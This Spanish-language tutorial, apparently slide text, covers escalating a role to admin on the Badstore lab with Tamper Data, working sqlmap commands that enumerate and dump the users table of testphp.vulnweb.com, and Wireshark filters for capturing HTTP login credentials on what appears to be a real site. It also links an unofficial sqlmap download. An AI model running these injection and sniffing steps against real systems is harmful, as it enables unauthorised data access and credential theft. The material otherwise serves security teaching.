1) El documento describe cómo atacar la aplicación Badstore utilizando Tamper Data en Firefox para cambiar el rol de usuario a administrador. Luego explica cómo usar sqlmap para identificar vulnerabilidades SQL e extraer datos de bases de datos de un sitio web vulnerable. 2) Finalmente, explica cómo usar Wireshark para capturar paquetes de red, incluidos detalles de inicio de sesión HTTP.
3. 1.
Badstore es un iso que simula una tienda virtual, la cual es utilizada para ataques informáticos sin generar destrozos. Arranca bajo una distribución Trinux. Es importante saber que dicha aplicación se monta en una máquina virtual como si estuviésemos instalando un nuevo sistema operativo.
4. Una vez instalada Badstore, aparecerá una pantalla negra, damos enter, digitamos el comando ifconfig y así obtenemos la ip inet addr (que para el caso es 192.168.190.132), la cual ubicamos en nuestro navegador. Así estamos listos para empezar nuestra explotación de vulnerabilidades del sitio.
1.
6. 1.
Nuestro ataque a Badstore lo llevaremos a cabo utilizando un complemento de Mozilla Firefox llamado Tamper Data. Procedemos a entrar a nuestra tienda online.
8. 1.
Antes de dar clic en registro, ejecutamos Tamper Data
9. 1.
Una vez ejecutado el complemento damos clic en Comenzar Modificación
10. 1.
A continuación nos aparece una ventana de ejecución donde cambiamos el role de U (usuario) a A (admin) y doy clic en Aceptar.
11. 1.
Procedo a ingresar a la página como el administrador (en la dirección que aparece en el navegador, al final y después del signo igual (=) elimino lo que esta escrito y pongo la palabra admin)
18. 2)
Para ejecutar sqlmap, primero debemos descargar la versión mas actualizada de Python de acuerdo al sistema operativo donde vamos a ejecutar sqlmap. La descarga la llevamos a cabo desde la página oficial de python www.python.org/downloads/, descargamos el ejecutable y procedemos con la respectiva instalación.
Para descargar sqlmap, lo podemos hacer desde la siguiente página http://www.mediafire.com/download/4oo7egc8f58i9ig/SQLmap+By+Julieinstein.zip, descargamos y descomprimimos el archivo.
Es importante aclarar que tanto Python como sqlmap deben quedar en la misma unidad de disco.
19. 2)
Posteriormente ejecutamos el símbolo del sistema y nos ubicamos en la unidad donde tenemos guardado el sqlmap
20. 2)
Desde el símbolo del sistema ejecutamos los comandos para atacar el sitio web http://testphp.vulnweb.com.
21. 2)
Verificamos la vulnerabilidad de nuestro sitio agregando un apóstrofe después del signo igual (=) al final de la dirección que aparece en nuestra barra de direcciones, al hacerlo obtenemos lo siguiente:
22. 2)
Detectada la vulnerabilidad, procedemos a averiguar el nombre de la de datos ejecutando el siguiente comando: sqlmap.py -u (Objetivo) –dbs, obteniendo el siguiente resultado:
sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=2 – dbs
23. 2)
Una vez identificadas las bases de datos, procedemos a extraer información de una de ellas, para este caso vamos a trabajar sobre la base de datos denominada “acuart”, dado que en la otra base de datos están disponibles datos y estadísticas del escanneo realizado.
Sin embargo con el siguiente comando podemos identificar la base de datos que utiliza el sitio: sqlmap.py -u (Objetivo) --current-db
sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=2 --current-db
24. 2)
Ahora vamos a extraer el nombre de las tablas de nuestra base de datos con el siguiente comando: sqlmap.py -u (Objetivo) -D (nombre BD) --tables
sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=2 -D acuart --tables
25. 2)
Ahora vamos a extraer las columnas de la tabla “users” utilizando el siguiente comando: sqlmap.py -u (Objetivo) -D acuart -T (tabla) --columns
sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=2 -D acuart -T users --columns
26. 2)
Ahora procedemos a extraer los datos de algunas columnas de la tabla users, ejecutando el siguiente comando: sqlmap.py -u (Objetivo) -D (Nombre de la BD) -T (Nom. de la tabla) -C (Nom. de la columna) –dump. Name: John Smith.
sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=2 -D acuart -T users -C name --dump
31. 2)
Y corroboramos que efectivamente nuestro ataque produjo resultados exitosos.
32. 3)
Descargamos wireshark de su página oficial http://www.wireshark.org/download.html, para este caso decidimos descargar la versión 1.10.10. Descargamos el ejecutable y procedemos con la instalación. Finalizada la instalación ejecutamos el software.
33. 3)
Damos clic en Interface List, seleccionamos Conexión de red inalámbrica, clic en Start y empieza el análisis.
35. 3)
Probemos algunos filtros…
1.Con el filtro ip.addr==(ip de la maquina a escuchar), podemos escuchar una máquina específica. Obviamente ésta debe estar siendo analizada.
36. 3)
2.El filtro http, nos permite mostrar el protocolo de las páginas que no tiene encriptación. Vamos a proceder a ejecutar nuestro navegador e ingresaremos a la página http://bajaebooks.com/. Sustraeremos el usuario (con su respectiva contraseña) que se ha logueado en la página.
38. 3)
Al lado del campo para insertar el filtro está la opción expression, damos clic y nos ubicamos en http y desplegamos sus opciones.
39. 3)
Y seleccionamos la opción http.request.method, clic en ok y clic en Apply. Como se mencionó anteriorment, la idea es averiguar el usuario con su contraseña del sitio a donde ha ingresado.
40. 3)
Obteniendo lo siguiente. Damos doble clic al paquete seleccionado (azul).